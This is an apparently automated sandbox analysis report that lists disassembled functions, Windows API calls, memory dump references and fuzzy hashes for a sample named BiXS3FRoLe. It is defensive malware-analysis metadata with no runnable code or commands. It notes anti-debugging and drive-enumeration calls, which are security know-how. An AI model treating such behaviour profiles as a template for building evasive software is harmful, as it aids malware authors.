                                                                                                        • CreateFileW.KERNEL32(00AFCC7E,00000008,00000007,00000000,00000003,02200000,00000000,AE695AF0,?,00000000,?,00AFCC7E,?), ref: 00AFC8A3
                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 00AFC8EA
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AFC924
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 33631002-0
                                                                                                        • Opcode ID: 3930aa5bafa0ffb9a5e5c51cdb29305e7e245b7ba7d0fc6d25ed12d5eaea2239
                                                                                                        • Instruction ID: 6718212a6d2c221230a55ec463c51e1375241f96b4849ba47258158887288f1d
                                                                                                        • Opcode Fuzzy Hash: 3930aa5bafa0ffb9a5e5c51cdb29305e7e245b7ba7d0fc6d25ed12d5eaea2239
                                                                                                        • Instruction Fuzzy Hash: 7F210A7168030CBBEB208BA9DD86FAA7BE8EB01B61F100165FA55A72D0D7B45A04D751
                                                                                                        Function 00B24F58 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00B25050
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B2505A
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00B25067
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                        • String ID:
                                                                                                        • API String ID: 3906539128-0
                                                                                                        • Opcode ID: 08493679651d336e1ad877a7df224b9a1d3374fce393f469f1b133e8872d0067
                                                                                                        • Instruction ID: a4f5aece9910ffd95235d53633cdec03d590e6a096ca27dfd40baec95ea4a10b
                                                                                                        • Opcode Fuzzy Hash: 08493679651d336e1ad877a7df224b9a1d3374fce393f469f1b133e8872d0067
                                                                                                        • Instruction Fuzzy Hash: 8B31C4749012289BCB21DF68DD88BDDBBF8AF08310F5045DAE41CA7250EB709F858F45
                                                                                                        Function 00B20E79 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00B20E4F,?,00B8C978,0000000C,00B20FA6,?,00000002,00000000), ref: 00B20E9A
                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00B20E4F,?,00B8C978,0000000C,00B20FA6,?,00000002,00000000), ref: 00B20EA1
                                                                                                        • ExitProcess.KERNEL32 ref: 00B20EB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1703294689-0
                                                                                                        • Opcode ID: d8f862aa9fb85d69f7b06ae0a41d536d9c8330370a109bf055b495eeb02037c1
                                                                                                        • Instruction ID: b0c73a23fac09fc1a568bcb26f9b2b14c99a121553550a8bb2e2f90addbd21d7
                                                                                                        • Opcode Fuzzy Hash: d8f862aa9fb85d69f7b06ae0a41d536d9c8330370a109bf055b495eeb02037c1
                                                                                                        • Instruction Fuzzy Hash: 81E04F31410608EFCF01BF24ED09A993BE9FB44B82F010494F84847222CF36DE81DB40
                                                                                                        Function 00AFC03B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___crtGetLocaleInfoEx.LIBCPMT ref: 00AFC056
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale___crt
                                                                                                        • String ID: 2
                                                                                                        • API String ID: 3761071962-450215437
                                                                                                        • Opcode ID: 94d9ae317dddcc1a3e64a75f7081b7145ae45ece0e556ca61f5891539d9c8b25
                                                                                                        • Instruction ID: f654e91c753068194e537d976f6d76ed75a0a4fe83f3853cedd565b3b43ece83
                                                                                                        • Opcode Fuzzy Hash: 94d9ae317dddcc1a3e64a75f7081b7145ae45ece0e556ca61f5891539d9c8b25
                                                                                                        • Instruction Fuzzy Hash: AEE06569D5121CFAEB189BC59E86ABD727CDB013ADF108194F20156081D6F59F84D162
                                                                                                        Function 00B29CD0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6e1faccc783a5bce54931ea931349e9719e99bdc845055f3f1321b3b226d0423
                                                                                                        • Instruction ID: 728d7d669c5c94fb79a02c2f2ff17a108bce5ac62c84c202be63a0c9ce1198a7
                                                                                                        • Opcode Fuzzy Hash: 6e1faccc783a5bce54931ea931349e9719e99bdc845055f3f1321b3b226d0423
                                                                                                        • Instruction Fuzzy Hash: AA023D71E002299FDF14DFA9D8806AEB7F1FF48324F2581AAD919E7384D731AD458B81
                                                                                                        Function 00AD62EB Relevance: 2.3, Strings: 1, Instructions: 1005COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 8431bf1585216168b14b9e69896166bb981aa5937ce0d909652faff991c4f99a
                                                                                                        • Instruction ID: f9ced110dd78ace9c40a68d9a6ab4eb0884a06a98b6056b719a87a5bc9080b75
                                                                                                        • Opcode Fuzzy Hash: 8431bf1585216168b14b9e69896166bb981aa5937ce0d909652faff991c4f99a
                                                                                                        • Instruction Fuzzy Hash: E6A27B74A10118EFCB18CF98D5A0ABDB7F1FB48310F25448EE596AB392CA35AE51DF50
                                                                                                        Function 00B31B71 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B31B6C,?,?,00000008,?,?,00B42C11,00000000), ref: 00B31D9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise
                                                                                                        • String ID:
                                                                                                        • API String ID: 3997070919-0
                                                                                                        • Opcode ID: d0da7d5afee5f06a2559c5b1d4428be397b384a6b3d375dae112bd6d0c82d95e
                                                                                                        • Instruction ID: 195f388c91989e3c498269810768c5e04fde916f8b8c64b16906d171d523aff6
                                                                                                        • Opcode Fuzzy Hash: d0da7d5afee5f06a2559c5b1d4428be397b384a6b3d375dae112bd6d0c82d95e
                                                                                                        • Instruction Fuzzy Hash: DEB13B31610608DFD715CF2CC48AB657BE4FF45364F258A98E89ACF2A1C736E991CB40
                                                                                                        Function 00A8DAF0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1378c1ea8ac008bea2a82f3f13e83508fd07694324477d16890ddb1fbed57b1c
                                                                                                        • Instruction ID: b948669db5817b41510fa3525dc3901c3c3a88568da8d0c435258c2ea8fc81fc
                                                                                                        • Opcode Fuzzy Hash: 1378c1ea8ac008bea2a82f3f13e83508fd07694324477d16890ddb1fbed57b1c
                                                                                                        • Instruction Fuzzy Hash: 6051A572A046598BCB18EF68DE95BAAB7F5FB64300F058659E4059B391EF31A901CB80
                                                                                                        Function 00A8D950 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000104,00000000), ref: 00A8D9EC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DriveLogicalStrings
                                                                                                        • String ID:
                                                                                                        • API String ID: 2022863570-0
                                                                                                        • Opcode ID: 00095bd6e2861f05f66b1a78497eea1cef6a9095a0deae9482169715c3f0477d
                                                                                                        • Instruction ID: 784a2db5f38f191690f796c7bd42fedd7f052f3a25dc7a51ca7dd0bd108bd533
                                                                                                        • Opcode Fuzzy Hash: 00095bd6e2861f05f66b1a78497eea1cef6a9095a0deae9482169715c3f0477d
                                                                                                        • Instruction Fuzzy Hash: 53410270D0424A9FDB14EFA4C885BAEFBF1EF45300F244259E405A73C1D7B9AA44CB91
                                                                                                        Function 00B3E7CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                          • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
                                                                                                        • EnumSystemLocalesW.KERNEL32(00B3E8F5,00000001,00000000,?,00B30C69,?,00B3EF22,00000000,?,?,?), ref: 00B3E83F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1084509184-0
                                                                                                        • Opcode ID: 7e366af156148b98e4b8a727fc2a3e3bfe5bedb383221a2c05d0571a67060384
                                                                                                        • Instruction ID: f0b43e7133bb6832352a81a0041c5a26f24d8084d6b18555321b9e52a1adda16
                                                                                                        • Opcode Fuzzy Hash: 7e366af156148b98e4b8a727fc2a3e3bfe5bedb383221a2c05d0571a67060384
                                                                                                        • Instruction Fuzzy Hash: 7111063AA007019FDB189F3988956BABBD1FB80358F24446DE59647B80D771B942C740
                                                                                                        Function 00B3E868 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                          • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
                                                                                                        • EnumSystemLocalesW.KERNEL32(00B3EB45,00000001,?,?,00B30C69,?,00B3EEE6,00B30C69,?,?,?,?,?,00B30C69,?,?), ref: 00B3E8B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1084509184-0
                                                                                                        • Opcode ID: f71658822bde725706e8a3fea5419f9fa2599fb07af1cf629f0ff78651a28fe1
                                                                                                        • Instruction ID: 73c83f1ea11bc3d5fd91fca7dd223929b7566b3b12eddac1a56475008c5afecf
                                                                                                        • Opcode Fuzzy Hash: f71658822bde725706e8a3fea5419f9fa2599fb07af1cf629f0ff78651a28fe1
                                                                                                        • Instruction Fuzzy Hash: 64F022367007041FDB149F39D881A6ABBD0EF81368F2444BEF9028B6D0DBB1EC42CA00
                                                                                                        Function 00B3E782 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B3437A: GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                          • Part of subcall function 00B3437A: _free.LIBCMT ref: 00B343B1
                                                                                                          • Part of subcall function 00B3437A: SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                          • Part of subcall function 00B3437A: _abort.LIBCMT ref: 00B343F8
                                                                                                        • EnumSystemLocalesW.KERNEL32(00B3E6D9,00000001,?,?,?,00B3EF44,00B30C69,?,?,?,?,?,00B30C69,?,?,?), ref: 00B3E7B9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1084509184-0
                                                                                                        • Opcode ID: 016790ecc42f982c8d85aadc858e309dc807d97a26e042a8abbdf4f4637dd9be
                                                                                                        • Instruction ID: 60c6c5bb0094db77828ebce2e1dc3383eaacf0fa3c4c2c7d327a8ee5c0430b6a
                                                                                                        • Opcode Fuzzy Hash: 016790ecc42f982c8d85aadc858e309dc807d97a26e042a8abbdf4f4637dd9be
                                                                                                        • Instruction Fuzzy Hash: 6DF0E53A30020597DB04AF76D85576A7FD4EFC1B64F1640AAFA158B390C771ED42D750
                                                                                                        Function 00AD4720 Relevance: 1.5, APIs: 1, Instructions: 18encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00AD4733
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextCryptRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 829835001-0
                                                                                                        • Opcode ID: c8cb9d7f161ff7a51e304db47228a3b08a3e2062b99e481343c864fa21021a37
                                                                                                        • Instruction ID: 9cb0141594849b82c1e8c4af6383b316f93e134069ac912aa30d0853be84ae38
                                                                                                        • Opcode Fuzzy Hash: c8cb9d7f161ff7a51e304db47228a3b08a3e2062b99e481343c864fa21021a37
                                                                                                        • Instruction Fuzzy Hash: 7BD05E7176432113D2316B189C49B4ABED85F16B42F08889AB989E73C0DBF1D84487A8
                                                                                                        Function 00B01ACA Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00091AD6,00B00DA2), ref: 00B01ACF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: a76fd38ff9785ab21207d634688544030aeed7a13a7e65512de16c11e30bf074
                                                                                                        • Instruction ID: 26d3e6aa25c3cf848e2e3156d3f14850159b01de1e39c14b3ce97e0d23504161
                                                                                                        • Opcode Fuzzy Hash: a76fd38ff9785ab21207d634688544030aeed7a13a7e65512de16c11e30bf074
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Function 00AB1630 Relevance: .8, Instructions: 781COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
